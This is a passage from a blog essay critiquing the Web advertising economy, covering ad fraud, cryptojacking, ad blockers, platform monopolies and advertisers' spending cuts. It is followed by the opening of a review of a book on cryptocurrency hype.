when it comes to preventing fraud, is also believed to be a victim <a href="http://adage.com/article/digital/google-makes-big-doubleclick-refund-policy/310554/">of a recent domain spoofing attack</a>. </blockquote>This problem is endemic and the scale of fraud is astonishing, as revealed by an <a href="http://adage.com/article/digital/business-insider-york-times-shed-details-ad-industry-s-biggest-problem/311081/">experiment run by <i>Business Insider</i></a>. One:<br /><blockquote class="tr_bq">Business Insider advertiser thought they had purchased $40,000 worth of ad inventory through the open exchanges when in reality, the publication only saw $97, indicating the rest of the money went to fraud.<br /><br />"There was more people saying they were selling Business Insider inventory then we could ever possibly imagine," ... "We believe there were 10 to 30 million impressions of Business Insider, for sale, every 15 minutes."<br /><br />To put the numbers in perspective, Business Insider says it sees 10 million to 25 million impressions a day. </blockquote>Any time the bad guys can siphon off 99.7% of the cashflow, the good guys have a problem.<br /><h4>Cryptojacking</h4>The idea that <a href="https://archive.is/19970601153143/http://www.millicent.digital.com/">micro-payments would be the business model for digital services</a> goes back to the early days of the Web, and was later one of the benefits <a href="http://p2pfoundation.ning.com/forum/topics/bitcoin-open-source">Satoshi Nakamoto initially touted for Bitcoin</a>:<br /><blockquote>Banks must be trusted to hold our money and transfer it electronically, but they lend it out in waves of credit bubbles with barely a fraction in reserve. We have to trust them with our privacy, trust them not to let identity thieves drain our accounts. Their massive overhead costs make micropayments impossible.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-KL8DimUYO-M/WgWFI80KzgI/AAAAAAAAEAw/HDgMJU2QCaUbpgercznGQ2lwvyfJ6miMQCLcBGAs/s1600/BitcoinTransactionCost.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="490" data-original-width="1335" height="73" src="https://1.bp.blogspot.com/-KL8DimUYO-M/WgWFI80KzgI/AAAAAAAAEAw/HDgMJU2QCaUbpgercznGQ2lwvyfJ6miMQCLcBGAs/s200/BitcoinTransactionCost.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://blockchain.info/charts/cost-per-transaction?timespan=1year">Source</a></td></tr></tbody></table>Alas, Bitcoin's "massive overhead costs" (over <a href="https://blockchain.info/charts/cost-per-transaction?timespan=1year">$10/transaction for the last 6 months</a>) and high probability of dropped transactions (currently about <a href="https://arxiv.org/abs/1704.01414v1">20%</a>) mean that micro-payments are one of its early promises upon which Bitcoin failed to deliver. Mining Bitcoin is the domain of data centers full of custom ASICs; it is far out of reach of the free VMs in your browser.<br /><br />Fortunately from the point of view of the bad guys, there are other cryptocurrencies that are easier to mine than Bitcoin, so still within the reach of the free VMs in browsers. Of course, this means they are worth less, but they aren't worthless. A company called <a href="https://coin-hive.com/">CoinHive</a> spotted this opportunity, and released a JavaScript miner for <a href="https://en.wikipedia.org/wiki/Monero_(cryptocurrency)">Monero</a>. Their idea was that web sites would, instead of selling space to advertisers, mine Monero in their readers browsers. As usual, The Pirate Bay was in the forefront of business model innovation on the Web. It was one of the sites that <a href="https://betanews.com/2017/09/16/pirate-bay-secret-bitcoin-miner/">experimented with this idea</a>.<br /><br />The experiments weren't a success. The sites didn't explain to their users why their CPUs were bogged down, or offer them a choice between ads and CPU cycles. But CoinHive's technology quickly found its market niche. Malvertising entrepreneurs realized that mining Monero was more directly profitable than many of the other plagues they visit upon their victims, and thus <a href="https://arstechnica.com/information-technology/2017/10/a-surge-of-sites-and-apps-are-exhausting-your-cpu-to-mine-cryptocurrency/">cryptojacking was born</a>.<br /><br />Cryptojacking involves breaking into a web site, or an advertiser, and adding JavaScript that invokes CoinHive's miner, or one of the rash of <a href="https://www.bleepingcomputer.com/news/security/the-internet-is-ripe-with-in-browser-miners-and-its-getting-worse-each-day/">copy-cat miners</a>. When a browser visits the web site, or a site displaying the advertiser's content, the miner is activated and mines as long as the page is open, typically consuming a large fraction of the available CPU cycles. As <a href="https://www.theregister.co.uk/2017/11/15/coin_mining_30000_sites_cryptojacking/" rel="nofollow">Iain Thomson reports for <i>The Register</i></a>:<br /><blockquote class="tr_bq">Mursch found 30,611 sites on the web running Coin Hive's JavaScript to effectively crypto-jack machines</blockquote>It <a href="https://www.theregister.co.uk/2017/11/15/coin_mining_30000_sites_cryptojacking/">appears that</a>:<br /><blockquote class="tr_bq">many of these mining operations are being run by one person. Mursch found that one “Mohammad Khezri” of Iran seems to be controlling <a href="https://pastebin.com/raw/FedTqVtr" rel="nofollow">a vast number</a> of mining operations spread across many domains to maximize his returns.</blockquote>Ad-blockers have <a href="https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/">rapidly adapted to this new incursion</a>:<br /><blockquote>At least two ad blockers have added support for blocking Coinhive's JS library - <a href="https://adblockplus.org/blog/kicking-out-cryptojack" rel="nofollow" target="_blank">AdBlock Plus</a> and <a href="https://blog.adguard.com/en/adguard_vs_mining/" rel="nofollow" target="_blank">AdGuard</a> - and developers have also put together Chrome extensions that terminate anything that looks like Coinhive's mining script - <a href="https://chrome.google.com/webstore/detail/antiminer-block-coin-mine/abgnbkcdbiafipllamhhmikhgjolhdaf" rel="nofollow" target="_blank">AntiMiner</a>, <a href="https://chrome.google.com/webstore/detail/no-coin/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en" rel="nofollow" target="_blank">No Coin</a>, and <a href="https://chrome.google.com/webstore/detail/minerblock/emikbbbebcdfohonlaifafnoanocnebl" rel="nofollow" target="_blank">minerBlock</a>. </blockquote>Is cryptojacking doomed? No! Firstly, ad-blockers haven't killed Web ads, because only some readers block ads. Secondly, there is the advent of Encrypted Media Extensions (EME), the W3C's DRM for the Web. The <a href="https://www.eff.org/deeplinks/2013/10/lowering-your-standards">whole goal of EME</a> is to ensure that the reader and their browser neither know what encrypted content is doing, nor can do anything about it. All that is needed for cryptojacking profitability is for the cryptojacker to use EME to encrypt the payload with the cryptocurrency miner. The reader and their browser may <a href="http://blog.dshr.org/2017/09/web-drm-enables-innovative-business.html">see their CPU cycles vanishing, but they can't know why</a>. Although in the nature of the arms race between advertisers and readers there is a <a href="https://www.bleepingcomputer.com/news/google/google-chrome-may-add-a-permission-to-stop-in-browser-cryptocurrency-miners/" rel="nofollow">proposal at Google that might prevent even EME-ed cryptomining</a>:<br /><blockquote>If a site is using more than XX% CPU for more than YY seconds, then we put the page into "battery saver mode" where we aggressively throttle tasks and show a toast [notification popup] allowing the user to opt-out of battery saver mode. When a battery saver mode tab is backgrounded, we stop running tasks entirely."</blockquote>There is also a problem with the economics of cryptojacking. The use of free CPU cycles to mine Monero will increase the supply of miners, and thus drive down the value in Monero of a CPU cycle. Like Bitcoin, the total supply of Monero is limited, so the more miners the smaller the share of the reward each can expect. If cryptojacking becomes popular, and it can <a href="http://blog.dshr.org/2017/09/web-drm-enables-innovative-business.html">evade the ad-blockers</a>, it will drive miners who have to pay for their CPU cycles out of the Monero blockchain.<br /><br />The main reason for transactions to use <a href="https://coincentral.com/monero-vs-bitcoin/">Monero is anonymity</a>:<br /><blockquote>Monero is now establishing itself as the â€˜coin of choiceâ€™ for people that want privacy in their transactions or that want to use Dark Markets. Bitcoin lost flavor with Dark Market users who quickly switched loyalty when they realized that Monero took privacy a few steps further than Bitcoin ever could.</blockquote>The supply of Monero is fixed irrespective of its price. The demand to both buy and sell Monero is currently the demand for anonymous transactions plus speculation. In order to spend their ill-gotten gains, cryptojackers need to sell the Monero they mine for "fiat currency", adding to the sell-side but not the buy-side, and thus driving the price in "fiat currency" down. If cryptojacking became significant in the Monero blockchain it would tend to be a self-limiting phenomenon. <br /><h3>Readers hate it</h3>OK, so fraud and insecurity is rampant in Web advertising. But that's true to some extent of everything on the Internet. People keep using e-mail despite the flood of spam and phishing. But in fact the e-mail ecosystem adapted. Techniques were developed to filter out the spam and phishing, and they were successful enough that they typical e-mail user sees very little of it.<br /><br />The analogous development has been happening for Web advertising. The <a href="http://amzn.to/2ecQ5E5">competition for eyeballs</a> drove advertisers to develop increasingly obnoxious ads, and economic pressure drove web sites to sell more and more of their space to run them. Reader's experience of the Web degraded, as <a href="http://blog.dshr.org/2016/08/ok-im-really-amazed.html">ads seized control of the page</a>, forced them to search for the tiny X that would kill the pop-over between them and the content, and made the page <a href="http://www.theregister.co.uk/2017/03/24/why_do_guis_jump_around_like_a_demented_terrier_while_starting_up_or_am_i_on_my_own/">bounce around like a demented terrier</a>:<br /><blockquote class="tr_bq">This leaves you chasing after buttons and tabs as they slide around, jump up and down, run about in circles and generally act like some demented terrier that has just dug up a stash of cocaine-laced Bonio.<br /><br />I blame web browser developers for letting this happen. Allowing websites to load into a browser window bit by bit was a mistake. Over the years, this has persuaded application developers into thinking this is acceptable behaviour when IT ISN'T.</blockquote>And now publishers are <a href="http://talkingpointsmemo.com/edblog/theres-a-digital-media-crash-but-no-one-will-say-it">inflicting auto-running video on&nbsp; their readers</a> (my emphasis):<br /><blockquote class="tr_bq">there have been numerous cases over the last six months to a year in which digital publishers have announced either major job cuts or in some cases literally fired their entire editorial teams in order to ‘pivot to video.’ The phrase has almost become a punchline since, as I’ve argued, there is basically <i>no publisher in existence involved in any sort of news or political news coverage who says to themselves, my readers are demanding more of their news on video as opposed to text</i>. Not a single one. The move to video is driven entirely by advertiser demand.</blockquote>You are not the customer; you are the product.<br /><br />Users responded by deploying "ad blockers" to regain some control over their browsing experience, and to defeat the <a href="http://ieee-security.org/TC/SPW2015/W2SP/papers/W2SP_2015_submission_32.pdf">trackers that infested the content</a> and <a href="http://blog.dshr.org/2016/08/fighting-web-flab.html">consumed much of their bandwidth</a>.<br /><br /><a href="https://www.cjr.org/tow_center/advertising-privacy-safari-chrome.php">Nushin Rashidian at <i>Columbia Journalism Review</i></a> reported that:<br /><blockquote>More than 28 percent of US internet users have <a href="https://www.wsj.com/articles/google-will-help-publishers-prepare-for-a-chrome-ad-blocker-coming-next-year-1496344237">installed</a> ad blockers. </blockquote>Doc Searl's <a href="https://medium.com/@dsearls/its-people-vs-advertising-not-publishers-vs-adblockers-da5f20ca50d0" rel="nofollow"><i>It's People vs. Advertising, not Publishers vs. Adblockers</i></a> makes a good point:<br /><blockquote class="tr_bq">nearly all press coverage of what's going on here defaults to "(name of publisher or website here) vs. ad blockers."<br /><br />This misdirects attention away from what is actually going on: people making choices in the open market to protect themselves from intrusions they do not want.<br /><br />Ad blocking and tracking protection are effects, not causes. Blame for them should not go to the people protecting themselves, or to those providing them with means for protection, but to the sources and agents of harm. </blockquote>The arms race between advertisers and readers continues, with Google <a href="https://www.androidcentral.com/chrome-updates-set-kill-annoying-auto-redirects-and-trick-click-pop-ups">enhancing their Chrome browser</a>:<br /><blockquote class="tr_bq">With Chrome 64, Google plans to tackle auto-redirects. We've all been there: you open a new tab or web page and just as it starts to load you get whisked away to a different page, often filled with nonsense or surveys or any other thing you didn't ask for an[d] never wanted to see. It's frustrating, especially when you can't go back or you get prompted to download random suspicious stuff. All you can do in those situations is close the page or tab and try to find your way back to where you wanted to be before the foolery happened.</blockquote>Alas, as I described in <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-4.html"><i>The Amnesiac Civilization: Part 4</i></a>:<br /><blockquote class="tr_bq">DRM-ing a site's content will prevent ads being blocked. Thus ad space on DRM-ed sites will be more profitable, and sell for higher prices, than space on sites where ads can be blocked. The pressure on advertising-supported sites, which include both free and subscription news sites, to DRM their content will be intense.</blockquote>Having accepted that valuable video and audio content deserves DRM protection, the W3C will find it hard to argue that valuable advertising content doesn't deserve similar protection. The readers who will bear the impact of obnoxious and malware-infested ads will have no voice in the decision; the W3C ignored unprecedented opposition to approve EME.<br /><h3>Webmasters hate it</h3><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-R4BBWmAVVWg/WgyBg4lwk_I/AAAAAAAAECo/gfXjytNFz_86dJD54VYszNCE1VkKquByQCLcBGAs/s1600/AdRevenueGrowth.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="152" data-original-width="768" height="63" src="https://1.bp.blogspot.com/-R4BBWmAVVWg/WgyBg4lwk_I/AAAAAAAAECo/gfXjytNFz_86dJD54VYszNCE1VkKquByQCLcBGAs/s320/AdRevenueGrowth.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://digitalcontentnext.org/blog/2016/06/16/google-and-facebook-devour-the-ad-and-data-pie-scraps-for-everyone-else/">Source</a></td></tr></tbody></table>Advertising pays for most of the content on the Web, but about 2/3 of the revenue from advertising, and almost all of the growth in revenue, goes to Google and Facebook, neither of whom produces any content. Not merely does Web advertising not bring in as much money as site owners think they deserve and need to produce quality content, but worse, it leaves the webmaster's business at the mercy of Google and Facebook. <a href="http://blog.dshr.org/2017/09/josh-marshall-on-google.html">Josh Marshall</a> runs <a href="http://talkingpointsmemo.com/"><i>Talking Points Memo</i></a>, a fairly successful independent news publisher. He wrote <a href="http://talkingpointsmemo.com/edblog/a-serf-on-googles-farm"><i>A Serf on Google's Farm</i></a>, a deep dive into the details of the relationship between his site and Google:<br /><blockquote class="tr_bq">It all starts with "DFP", a flavor of Doubleclick called DoubleClick for Publishers (DFP). DoubleClick was one of the early "ad-serving companies"Â that Google purchased years ago. ... DFP is the application (or software, or system - you could define it in different ways) that serves ads on TPM. I don't know the exact market penetration. But it's the hugely dominant player in ad serving across the web. So on TPM, Google software manages the serving of ads. Our ads all drive on Google's roads.<br /><br />Then there's AdExchange. That's the part of Google that buys ad inventory. A huge amount of our ads come through ad networks. AdExchange is far and away the largest of those for us - often accounting for around 15% of total revenues every month - sometimes higher. So our largest single source of ad revenue is usually Google. To be clear that's not Google advertising itself but advertisers purchasing our ad space <i>through</i> Google. But every other ad we ever run runs over Google's ad serving system too. So Google software/service (DFP) runs the ad ecosystem on TPM. And the main buyer within that ecosystem is another Google service (Adexchange).</blockquote>Advertisers are the customers for an ad-supported site's business, readers are the product. Google controls the channel by which the site sells its product to its customers. Not a comfortable place for a business to be. Marshall certainly isn't comfortable:<br /><blockquote>The publishers use DoubleClick. The big advertisers use DoubleClick. The big global advertising holding companies use Doubleclick. Everybody at every point in the industry is wired into DoubleClick. Here's how they all play together. The adserving (Doubleclick) is like the road. (Adexchange) is the biggest car on the road. But only AdExchange gets full visibility into what's available. (There's lot of details here and argument about just what Google does and doesn't know. But trust me on this. They keep the key information to themselves. This isn't a suspicion. It's the model.) So Google owns the road and gets first look at what's on the road. Not only does Google own the road and makes the rules for the road, it has special privileges on the road. One of the ways it has special privileges is that it has all the data it gets from search, Google Analytics and Gmail. It also gets to make the first bid on every bit of inventory. Of course that's critical. First dibs with more information than anyone else has access to. (Some exceptions to this. But that's the big picture.) It's good to be the king. It's good to be a Google.</blockquote>Marshall's response is to reduce his dependency on advertising:<br /><blockquote class="tr_bq">We could see this coming a few years ago. And we made a decisive and longterm push to restructure our business around subscriptions. So I'm confident we will be fine. But journalism is not fine right now. And journalism is only one industry the platform monopolies affect. Monopolies are bad for all the reasons people used to think they were bad. They raise costs. They stifle innovation. They lower wages. And they have perverse political effects too. Huge and entrenched concentrations of wealth create entrenched and dangerous locuses of political power.</blockquote>[Full disclosure - I subscribe to <a href="http://talkingpointsmemo.com/"><i>Talking Points Memo</i></a> and access subscriber-only content in return.]. Marshall's choice of the "freemium" model supported by both advertising and subscription is common, as <a href="https://www.cjr.org/business_of_news/newspaper-paywalls.php">Ariel Stulberg writes in Columbia Journalism Review</a>:<br /><blockquote>Even as they’ve added paying Web subscribers by the hundreds of thousands, daily newspapers have decisively rejected an all-in approach featuring “hard” website paywalls that mimic their print business models. Instead, most are employing either “leaky” paywalls with unlimited “side doors” for non-subscribers or no paywalls at all, according to a CJR analysis of the nation’s 25 most-visited daily newspaper sites.<br /><br />There was little agreement on a paywall strategy and certainly no consensus solution to the problem of the “ideal” newspaper paywall. The paywalled news sites, 15 in total, diverged widely in the cost of their subscriptions, the number of free articles dispensed, the specific combination of “side door” exceptions employed, and whether they operated via one flagship website or two—one free and one for subscribers.<br /><br />Despite what seems like widespread optimism about the prospect of digital subscriptions buttressing the industry, a full 10 sites, 40 percent of the outlets we looked at, focused on ad revenue exclusively, eschewing paywalls.</blockquote>Marshall isn't alone in his discomfort, either. <a href="https://digitalcontentnext.org/blog/2016/06/16/google-and-facebook-devour-the-ad-and-data-pie-scraps-for-everyone-else/">Melody Kramer writes for the Poynter Institute</a>:<br /><blockquote class="tr_bq">And despite our (perhaps) growing unease with these platforms, we still rely on the them for distribution. In their excellent report on the convergence between publishers and platforms, Emily Bell and Taylor Owen <a href="https://www.cjr.org/tow_center_reports/platform-press-how-silicon-valley-reengineered-journalism.php">write that</a> “A growing number of news organizations see investing in social platforms as the only prospect for a sustainable future, whether for traffic or for reach,” echoing what Franklin Foer <a href="https://www.theatlantic.com/amp/article/534195/?utm_medium=referral&amp;utm_campaign=amp&amp;utm_source=www.poynter.org-RelayMediaAMP">recently wrote</a> in The Atlantic about The New Republic’s increasing dependency on these platforms — and what their algorithms might surface: “Dependence generates desperation — a mad, shameless chase to gain clicks through Facebook, a relentless effort to game Google’s algorithms. It leads media outlets to sign terrible deals that look like self-preserving necessities: granting Facebook the right to sell their advertising, or giving Google permission to publish articles directly on its fast-loading server. In the end, such arrangements simply allow Facebook and Google to hold these companies ever tighter.”</blockquote>Marshall continues his <a href="http://talkingpointsmemo.com/edblog/theres-a-digital-media-crash-but-no-one-will-say-it">insider analysis of the economics of Web publishing</a> by predicting a crash:<br /><blockquote class="tr_bq">You have three different factors coming together at once: two primary ones and one secondary but critical one.<br /><br />First, digital publishing has always been ruled by a basic structural reality: there are too many publications. ... Well, it’s like this: There are too many publications relative to the funding available to support them, given that it has been almost universally assumed that the funding comes from advertising. That creates the furious competition for clicks and the ever growing intrusiveness of ads. The advertisers have all the power. So rates are always going down.<br />...<br />Then came the platform monopolies: Google, Facebook and a few others. Over the last five years or so but accelerating rapidly in the last 24 months, they’ve gobbled up almost all of the growth in advertising revenue and begun to engross a substantial amount of the existing advertising revenue as well.<br />...<br />Now, here’s the too little discussed part of the equation. A huge, huge, huge amount of digital media is funded by venture capital. That’s not just to say they had investors at the start but in effect a key revenue stream of many digital publications has been on-going infusions of new investment.<br /><br />Much of that investment has been premised on the assumption that scale – being huge – would allow publications to create stable and defensible business models. ... But that hasn’t happened. Just as one fact point, The Wall Street Journal reported today that Buzzfeed is going to miss its revenue target this year by as much as 20%. That’s a lot.<br />...<br />Another way of putting that is that the future that VCs and other investors were investing hundreds of millions of dollars in probably doesn’t exist. And that means that they’re much less likely to invest more money at anything like the valuations these companies have been claiming.<br /><br />The big picture is that Problem #1 (too many publications) and Problem #2 (platform monopolies) have catalyzed together to create Problem #3 (investors realize they were investing in a mirage and don’t want to invest any more). Each is compounding each other and leading to something like the crash effect you see in other bubbles</blockquote>After the shark comes the crash.<br /><h3>Advertisers find it wastes money</h3>Procter and Gamble, the world's biggest advertiser, <a href="https://ftalphaville.ft.com/2017/08/01/2192116/mega-advertiser-provides-a-challenge-to-the-tech-juggernauts/" rel="nofollow">cut spending on digital ads</a>:<br /><blockquote class="tr_bq">by an amount equating to $140mm. For context, P&amp;G spent $7.2bn on advertising during its fiscal 2015, and likely around $1.5bn in digital advertising, or ~$400mm per quarter. An advertiser like P&amp;G might allocate around 70% of digital advertising budgets to Google and Facebook ($300mm?). P&amp;G's prior rhetoric regarding Facebook and Google (and crude math, given the scale of the cuts) strongly suggest that these media owners would have experienced cuts.</blockquote>And <a href="https://ftalphaville.ft.com/2017/08/01/2192116/mega-advertiser-provides-a-challenge-to-the-tech-juggernauts/" rel="nofollow">nothing bad happened to P&amp;G</a>:<br /><blockquote class="tr_bq">Most critically, because P&amp;G indicated its view that <b>reductions did not impact revenue growth</b>, the statement will undoubtedly add fuel to the fire of large brands more carefully scrutinizing their digital advertising choices. Large advertisers represent around 30% of Facebook revenues, on our estimates.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden reports that</a>:<br /><blockquote>Previously P&amp;G's CFO had said that “the reduction in marketing that occurred was almost all in the digital space. <b>And what it reflected was a choice to cut spending from a digital standpoint where it was ineffective: </b>where either we were serving bots as opposed to human beings, or where the placement of ads was not facilitating the equity of our brands."<br /><br />Moeller also touched on the two most common complaints about digital advertising scams: advertisers are paying for ads that are viewed and clicked on by bots, not humans; and ads are placed by thousands of automated “ad exchanges” that are out of control of the advertiser on sites and pages that don’t match the advertiser’s products.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden</a> also reports that it isn't just P&amp;G:<br /><blockquote class="tr_bq">Restoration Hardware delightfully colorful CEO, Gary Friedman, divulged the following striking anecdote about the company's online marketing strategy, and the state of online ad spending in general ... What Friedman revealed - in brief - was the following: "<b>we've found out that 98% of our business was coming from 22 words. So, wait, we're buying 3,200 words and 98% of the business is coming from 22 words. What are the 22 words? And they said, well, it's the word Restoration Hardware and the 21 ways to spell it wrong, okay?</b>"<br /><br />Stated simply, the vast, vast majority of online ad spending is wasted, chasing clicks that simply are not there.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Friedman concluded:</a><br /><blockquote>I mean, I can't believe how many companies buy their own name <b>and they're paying Google millions of dollars a year for their own name</b>, like maybe if this is webcast, right, a lot of people are going to go, holy crap. <b>They're going to look at their investments</b>. They'd go, maybe we don't need to buy our own name. <b>Google's market cap might go down...</b></blockquote><a href="https://www.cjr.org/tow_center/advertising-privacy-safari-chrome.php">Nushin Rashidian at <i>Columbia Journalism Review</i></a> reported that:<br /><blockquote>This has been the <a href="https://www.theguardian.com/business/2017/aug/23/wpp-advertisers-spending-sir-martin-sorrell-growth-forecasts">worst year since 2000 for WPP</a>, the world’s largest ad agency, after, earlier this year, two of the biggest ad spenders in the world, Procter &amp; Gamble and Unilever, <a href="http://www.businessinsider.com/two-of-the-worlds-biggest-brands-are-cutting-back-on-on-digital-ads-2017-6">decided</a> to slash ad spending in part because of concerns around the transparency and performance of hyper-targeted ads served by algorithms.</blockquote><h3>So What?</h3><a href="https://wolfstreet.com/2017/07/28/procter-gamble-slashed-digital-ad-spending-what-happened-next/">Wolf Richter writes</a>:<br /><blockquote class="tr_bq">There’s a larger issue: Retail spending (not adjusted for inflation) has grown on average 2.4% per year in the US over the past five years. Over the same period, digital advertising nearly <a href="http://wolfstreet.com/2017/04/26/internet-ad-revenues-surge-only-two-companies-get-the-spoils/" rel="noopener" target="_blank">doubled to $72.5 billion</a> in 2016. Clearly, even digital advertising – despite the lure of Facebook and the like – cannot induce consumers overall to spend more and increase the size of the overall pie for advertisers. It can only, at best, divide up the pie differently.<br /><br />And when one of the most sophisticated high-tech advertisers in the world decides it is overspending on digital advertising and is able to <i>very carefully</i> remove the rot, thus bringing down its costs without hurting its revenues, other companies will follow, with some consequences for the relentless but often ineffective surge of digital advertising dollars.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durdern again</a>:<br /><blockquote>Of course, the implications to this admission that online advertising was either being gamed by bots, or generally underperforming were significant, as it jeopardized the future revenue streams of two of the biggest companies in the world, Alphabet (aka Google) and Facebook, both almost entirely reliant on online advertising. How long before other anchor names decided to similarly cut back on their online ad spending?&nbsp; In short: slowly but surely, chronic buyers online advertising space, are slowly waking up to the fact that "adtech" may be one of the biggest hype (and hope) bubbles in history. Not all of it, but a material, substantial portion: one that may be responsible for a significant chunk of Google's or Facebook's cash flow and market cap. </blockquote><a href="https://wolfstreet.com/2017/07/28/procter-gamble-slashed-digital-ad-spending-what-happened-next/">Wolf Richter again</a>:<br /><blockquote class="tr_bq">When P&amp;G speaks about cutting digital advertising, people listen, other companies follow, and the advertising industry quakes in its boots.<br /><br />In April, P&amp;G announced some details of its $12 billion or so cost-cutting binge over five years. This includes slashing $2 billion in advertising expenditures – among them $1 billion in media and $500 million in agency fees.<br /><br />A year ago P&amp;G announced that it would move away from ads on Facebook that micro-target specific consumers. Facebook is trying to leverage its enormous trove of consumer data to enhance its income. This has been its big promise. But P&amp;G found that this micro-targeting of specific consumers based on the data Facebook has collected on them reduced reach and wasn’t working.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden again</a>:<br /><blockquote>A separate, if just as concerning problem emerged last month, when the <a href="http://www.zerohedge.com/news/2017-08-25/google-refund-fake-traffic-advertising-revenue">WSJ reported </a>that online ad giant, Google, would issue refunds to advertisers for ads bought through its platform that ran on sites with fake traffic, and generated no actionable advertising "clicks." Just how much of Google's ad revenue (and thus profits and market cap) had been inflated over the years by said "fake ads"? </blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden concludes</a>:<br /><blockquote>One wonders how long before all retailers - most of whom are notoriously strapped for revenues and profits courtesy of Amazon - and other "power users" of online advertising, do a similar back of the envelope analysis, and find that they, like RH, <b>are getting a bang for only 2% of their buck?</b> What will happen to online ad spending then? And what will happen to the online ad giants, if the vast majority of ad spending that justified their hundreds of bilions in market cap is exposed as "bloat"? As Friedman politely, yet sarcastically put it, "<b>Googles market cap might go down</b>"...</blockquote>Clearly, the price of <a href="http://www.nasdaq.com/symbol/googl/real-time">GOOGL</a> and <a href="http://www.nasdaq.com/symbol/fb/real-time">FB</a> is what financial journalists like Durden and Richter care about. But, given the winner-take-all nature of technology markets, my guess is that a reduction in overall spending on online advertising is going to be a much bigger problem for smaller web sites than for Google and Facebook. Its going to accelerate the <a href="http://blog.dshr.org/2017/08/why-is-web-centralized.html">centralization of the Web</a>.<br /><br />The more the Web is dominated by Google, Facebook and Twitter the more their algorithms drive journalists in their search for clicks. Examples abound, <a href="http://amp.poynter.org/news/conversation-about-machine-learning-and-journalism-maciej-ceglowski-pinboard">such as</a>:<br /><blockquote class="tr_bq">If you searched Google immediately after the recent mass shooting in Texas for information on the gunman, you would have seen what Justin Hendrix, the head of the NYC Media Lab, <a href="https://twitter.com/justinhendrix/status/927335154707828736">called</a> a “misinformation gutter.”</blockquote>The "misinformation gutter" came from Google's ranking algorithm prioritizing random tweets above actual reporting. <a href="http://amp.poynter.org/news/conversation-about-machine-learning-and-journalism-maciej-ceglowski-pinboard">Melody Kramer writes</a>:<br /><blockquote class="tr_bq">This reliance on algorithmic click-chasing was the basis for a <a href="http://idlewords.com/2017/09/anatomy_of_a_moral_panic.htm">recent essay</a> by Maciej Ceglowski, who runs a bookmarking site called <a href="https://pinboard.in/">Pinboard</a> and <a href="http://www.idlewords.com/">frequently writes</a> about socio-technological issues. He traces one story that burgeoned out of Amazon’s “frequently bought together” algorithm, and then spread very quickly to other media outlets, despite little evidence that it was true. Justification for republishing, he wrote, was often because other news outlets had already reported on it.</blockquote>She goes on to interview Cegłowski. It is a <a href="http://amp.poynter.org/news/conversation-about-machine-learning-and-journalism-maciej-ceglowski-pinboard">must-read piece</a>, and so is Cegłowski's essay <a href="http://idlewords.com/2016/10/anatomy_of_a_moral_panic.htm"><i>Anatomy of a Moral Panic</i></a>:<br /><blockquote class="tr_bq">The real story in this mess is not the threat that algorithms pose to Amazon shoppers, but the threat that algorithms pose to journalism. By forcing reporters to optimize every story for clicks, not giving them time to check or contextualize their reporting, and requiring them to race to publish follow-on articles on every topic, the clickbait economics of online media encourage carelessness and drama. This is particularly true for technical topics outside the reporter’s area of expertise.</blockquote>The combination of winner-take-all markets and the dependence of the Web on advertising is rapidly degrading the signal to noise ratio. So it isn't just the fact the everyone involved (except the bad guys, Google and Facebook) hates the system, but it is causing actual harm to society.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com2tag:blogger.com,1999:blog-4503292949532760618.post-91877974090895933482017-11-16T08:00:00.005-08:002017-11-16T08:00:01.264-08:00Techno-hype part 2<div style="text-align: center;"><i>Don't, don't, don't, don't believe the hype!</i></div><div style="text-align: center;">Public Enemy</div><br />Enough about the <a href="http://blog.dshr.org/2017/11/techno-hype-part-1.html">hype around self-driving cars,</a> now on to the hype around cryptocurrencies.<br /><br />Sysadmins like David Gerard tend to have a realistic view of new technologies; after all, they get called at midnight when the technology goes belly-up. Sensible companies pay a lot of attention to their sysadmins' input when it comes to deploying new technologies.<br /><br />Gerard's <a href="https://smile.amazon.com/Attack-50-Foot-Blockchain-Contracts-ebook/dp/B073CPP581/ref=sr_1_1"><i>Attack of the 50 Foot Blockchain: Bitcoin, Blockchain, Ethereum &amp; Smart Contracts</i></a> is a must-read, massively sourced corrective to the hype surrounding cryptocurrencies and blockchain technology. Below the fold, some tidbits and commentary. Quotes not preceded by links are from the book, and I have replaced some links to endnotes with direct links.<br /><a name='more'></a><br />Gerard's overall thesis is that the hype is driven by ideology, which has resulted in cult-like behavior that ignores facts, such as:<br /><blockquote class="tr_bq">Bitcoin ideology assumes that inflation is a purely monetary phenomenon that can only be caused by printing more money, and that Bitcoin is immune due to its strictly limited supply. This was demonstrated trivially false when the price of a bitcoin dropped from $1000 in late 2013 to $200 in early 2015 - 400% inflation - while supply only went up 10%.</blockquote>There's recent evidence for this in the collapse of the SegWit2x proposal to improve Bitcoin's ability to scale. As <a href="https://arstechnica.com/tech-policy/2017/11/bitcoin-compromise-collapses-leaving-future-growth-in-doubt/">Timothy B Lee writes</a>:<br /><blockquote class="tr_bq">There's a certain amount of poetic justice in the fact that leading Bitcoin companies trying to upgrade the Bitcoin network were foiled by a populist backlash. Bitcoin is as much a political movement as it is a technology project, and the core idea of the movement is 